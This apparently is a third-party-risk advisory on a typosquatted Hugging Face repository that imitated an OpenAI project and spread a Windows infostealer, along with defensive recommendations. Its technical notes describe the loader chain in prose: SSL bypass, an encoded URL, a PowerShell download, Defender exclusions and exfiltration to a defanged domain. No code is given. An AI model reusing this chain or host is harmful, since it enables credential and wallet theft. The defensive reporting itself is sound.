Typosquatted OpenAI Repository on Hugging Face Distributes Infostealer Malware to Windows Users
What Happened — A malicious repository on Hugging Face impersonated OpenAI’s “Privacy Filter” project. The repo, titled Open-OSS/privacy-filter, delivered a Python loader that fetched and executed a Rust‑based infostealer on Windows machines, stealing browser data, crypto wallets, Discord tokens, and system information. The repository briefly hit #1 on Hugging Face’s trending list and recorded 244 000 downloads before removal.
Why It Matters for TPRM —
- Third‑party model‑sharing platforms can be weaponised to distribute malware to downstream developers and enterprises.
- Compromise of credential stores and crypto wallets creates downstream supply‑chain risk for any organisation that integrates the malicious model.
- The campaign demonstrates how “trusted” AI repositories can be abused, highlighting the need for rigorous vetting of external code assets.
Who Is Affected — SaaS and cloud‑based AI/ML developers, data‑science teams, and any organisation that downloads models or scripts from public model hubs.
Recommended Actions —
- Review any usage of Hugging Face repositories; verify source authenticity before integration.
- Enforce code‑signing and sandbox execution for downloaded scripts.
- Update endpoint protection to detect the loader’s PowerShell and batch behaviours.
- Conduct credential rotation for any accounts that may have been exposed.
Technical Notes — The loader disables SSL verification, decodes a base64 URL, and runs a PowerShell command that downloads a batch file. The batch escalates privileges, adds the final Rust infostealer to Microsoft Defender exclusions, and exfiltrates data to recargapopular.]com. Anti‑analysis checks target VMs, sandboxes, and debuggers. No CVE is associated; the vector is a supply‑chain malware drop via a third‑party repository. Source: [BleepingComputer